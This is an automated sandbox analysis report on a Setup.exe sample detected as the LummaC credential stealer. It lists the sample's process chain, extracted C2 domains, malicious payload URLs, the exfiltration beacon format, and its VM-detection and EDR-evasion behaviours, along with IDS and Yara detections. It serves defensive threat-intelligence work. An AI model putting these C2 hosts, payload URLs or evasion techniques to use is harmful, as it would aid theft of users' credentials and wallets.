Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1557280
MD5:0bf89e05c575d4bcdcdadb17c7517c29
SHA1:1040de2dca7b63045e6f201b62ff782154e2693c
SHA256:8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • Setup.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 0BF89E05C575D4BCDCDADB17C7517C29)
    • choice.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\choice.exe MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • 7LUEA3.pif (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx" MD5: 3F58A517F1F4796225137E7659AD2ADB)
          • InstallUtil.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • InstallUtil.exe (PID: 980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • InstallUtil.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sliperyedhby.icu", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs", "3xc1aimbl0w.sbs"], "Build id": "tLYMe5--222new"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Setup.exeWindows_Trojan_Remotemanipulator_9ec52153unknownunknown
  • 0x2445e0:$a1: killself.bat
  • 0x244608:$a1: killself.bat
  • 0x24266c:$a2: rutserv.exe
  • 0x51d47c:$a2: rutserv.exe
  • 0x242690:$a3: rfusclient.exe
  • 0x51d450:$a3: rfusclient.exe
  • 0x242c48:$a4: install.log
  • 0x51d4b8:$a5: Unable to create Agent's path.

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Remotemanipulator_9ec52153unknownunknown
    • 0x2441e0:$a1: killself.bat
    • 0x244208:$a1: killself.bat
    • 0x24226c:$a2: rutserv.exe
    • 0x51d07c:$a2: rutserv.exe
    • 0x242290:$a3: rfusclient.exe
    • 0x51d050:$a3: rfusclient.exe
    • 0x242848:$a4: install.log
    • 0x51d0b8:$a5: Unable to create Agent's path.
    00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Remotemanipulator_9ec52153unknownunknown
    • 0x244600:$a1: killself.bat
    • 0x244628:$a1: killself.bat
    • 0x24268c:$a2: rutserv.exe
    • 0x51d49c:$a2: rutserv.exe
    • 0x2426b0:$a3: rfusclient.exe
    • 0x51d470:$a3: rfusclient.exe
    • 0x242c68:$a4: install.log
    • 0x51d4d8:$a5: Unable to create Agent's path.
    Process Memory Space: msiexec.exe PID: 7084JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: msiexec.exe PID: 7084JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        Process Memory Space: 7LUEA3.pif PID: 6400JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.Setup.exe.8d0000.0.unpackWindows_Trojan_Remotemanipulator_9ec52153unknownunknown
          • 0x2445e0:$a1: killself.bat
          • 0x244608:$a1: killself.bat
          • 0x24266c:$a2: rutserv.exe
          • 0x51d47c:$a2: rutserv.exe
          • 0x242690:$a3: rfusclient.exe
          • 0x51d450:$a3: rfusclient.exe
          • 0x242c48:$a4: install.log
          • 0x51d4b8:$a5: Unable to create Agent's path.

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\dfbffdd\AutoIt3.exe" C:\dfbffdd\cbdaghf.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\7LUEA3.pif, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cbdaghf
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", CommandLine: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\7LUEA3.pif, NewProcessName: C:\Users\user\AppData\Roaming\7LUEA3.pif, OriginalFileName: C:\Users\user\AppData\Roaming\7LUEA3.pif, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7084, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", ProcessId: 6400, ProcessName: 7LUEA3.pif
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.131.254, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7084, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T00:15:22.667750+010020283713Unknown Traffic192.168.2.1649704172.67.131.254443TCP
          2024-11-18T00:15:24.184664+010020283713Unknown Traffic192.168.2.1649706172.67.131.254443TCP
          2024-11-18T00:15:25.926360+010020283713Unknown Traffic192.168.2.1649707172.67.131.254443TCP
          2024-11-18T00:15:27.372592+010020283713Unknown Traffic192.168.2.1649708172.67.131.254443TCP
          2024-11-18T00:15:28.840912+010020283713Unknown Traffic192.168.2.1649709172.67.131.254443TCP
          2024-11-18T00:15:30.463927+010020283713Unknown Traffic192.168.2.1649710172.67.131.254443TCP
          2024-11-18T00:15:31.771417+010020283713Unknown Traffic192.168.2.1649711172.67.131.254443TCP
          2024-11-18T00:15:33.112356+010020283713Unknown Traffic192.168.2.1649712172.67.131.254443TCP
          2024-11-18T00:15:34.414146+010020283713Unknown Traffic192.168.2.1649713172.67.131.254443TCP
          2024-11-18T00:15:35.490437+010020283713Unknown Traffic192.168.2.1649714172.67.131.254443TCP
          2024-11-18T00:15:36.680327+010020283713Unknown Traffic192.168.2.1649715172.67.185.54443TCP
          2024-11-18T00:15:38.963659+010020283713Unknown Traffic192.168.2.1649716172.67.185.54443TCP
          2024-11-18T00:15:43.503073+010020283713Unknown Traffic192.168.2.1649717172.67.185.54443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T00:15:23.279515+010020546531A Network Trojan was detected192.168.2.1649704172.67.131.254443TCP
          2024-11-18T00:15:24.725081+010020546531A Network Trojan was detected192.168.2.1649706172.67.131.254443TCP
          2024-11-18T00:15:36.027674+010020546531A Network Trojan was detected192.168.2.1649714172.67.131.254443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T00:15:23.279515+010020498361A Network Trojan was detected192.168.2.1649704172.67.131.254443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T00:15:24.725081+010020498121A Network Trojan was detected192.168.2.1649706172.67.131.254443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T00:15:32.288914+010020480941Malware Command and Control Activity Detected192.168.2.1649711172.67.131.254443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH=Avira URL Cloud: Label: malware
          Source: https://cdn1.pixel-story.shop/runcl.binAvira URL Cloud: Label: malware
          Source: https://cdn1.pixel-story.shop/clp_pa.32nAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydiAvira: detection malicious, Label: HEUR/AGEN.1316118
          Found malware configuration
          Source: 5.2.msiexec.exe.2e0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["sliperyedhby.icu", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs", "3xc1aimbl0w.sbs"], "Build id": "tLYMe5--222new"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydiReversingLabs: Detection: 65%
          Multi AV Scanner detection for submitted file
          Source: Setup.exeReversingLabs: Detection: 29%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydiJoe Sandbox ML: detected
          Sample uses string decryption to hide its real strings
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: faintbl0w.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: 300snails.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xc1aimbl0w.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: thicktoys.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: sliperyedhby.icu
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--222new
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F3DD8 CryptUnprotectData,5_2_002F3DD8
          Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: tapiperf.pdb source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: tapiperf.pdbGCTL source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0619855F FindFirstFileExW,5_2_0619855F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015447DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_015447DD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154210D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_0154210D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015448E5 FindFirstFileA,GetLastError,12_2_015448E5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, byte ptr [eax]5_2_002FD190
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+46373C8Dh]5_2_002ED5E6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]5_2_002F586C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+4316ED1Fh]5_2_0030806C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h5_2_003168B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], B62B8D10h5_2_003168B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+661B5E61h]5_2_0031C0A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+661B5E61h]5_2_0031C0A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, ecx5_2_00319883
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+10h]5_2_003180FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h5_2_002FE0F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+56151C14h]5_2_003000C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]5_2_003198CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-75722124h]5_2_002EC92E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+661B5E61h]5_2_0031C130
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+661B5E61h]5_2_0031C130
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp ah, 0000002Eh5_2_00302939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00302939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+4316ED1Fh]5_2_003081D4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [eax], cl5_2_003081D4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, byte ptr [esi+edi-58D3BBDCh]5_2_003069C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push esi5_2_00305A63
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]5_2_002E7AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, word ptr [edi+eax*4]5_2_002E7AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edx, ecx5_2_002EE30B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h5_2_00306300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]5_2_0031AB70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp byte ptr [ebp+eax+01h], 00000000h5_2_00303358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebp, byte ptr [ebx]5_2_002E9B50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+72F0D58Dh]5_2_002E9B50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]5_2_002FE350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edx, ecx5_2_00316390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edi, byte ptr [esi+edx-0D8AF529h]5_2_00307391
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebx], al5_2_002FA380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [edx+ecx]5_2_002FA380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [edx+edi]5_2_002FA380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h5_2_00301380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_00310C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+18h]5_2_002F4C0D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]5_2_002F4C0D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp eax5_2_002F4C0D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h5_2_00301440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+0000009Ch]5_2_00307CA3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+0000009Ch]5_2_00307CAB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx-3Dh]5_2_0031B480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp esi5_2_0031BCF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov word ptr [edx], cx5_2_002F84F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ebx+00h]5_2_002E1D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+661B5E61h]5_2_0031C510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp eax5_2_00302D67
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_00305DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [esi], al5_2_002F7DCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h5_2_00316E10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h5_2_00314610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ecx, eax5_2_002F7EFE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, edx5_2_002E96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h5_2_00304710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ecx, eax5_2_002F7F00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_002E1F10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-77096577h]5_2_00316F70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+56151C14h]5_2_002FFF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov word ptr [eax], cx5_2_00302740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [0032850Ch]5_2_002EBFA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esi, ecx5_2_00304FF0
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 4x nop then mov dword ptr [esp], edx12_3_09C55748

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49711 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49714 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49706 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49706 -> 172.67.131.254:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: sliperyedhby.icu
          Source: Malware configuration extractorURLs: faintbl0w.sbs
          Source: Malware configuration extractorURLs: 300snails.sbs
          Source: Malware configuration extractorURLs: thicktoys.sbs
          Source: Malware configuration extractorURLs: 3xc1aimbl0w.sbs
          Source: global trafficTCP traffic: 192.168.2.16:49719 -> 62.60.234.80:1466
          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49709 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49706 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49710 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 172.67.185.54:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 172.67.185.54:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49708 -> 172.67.131.254:443
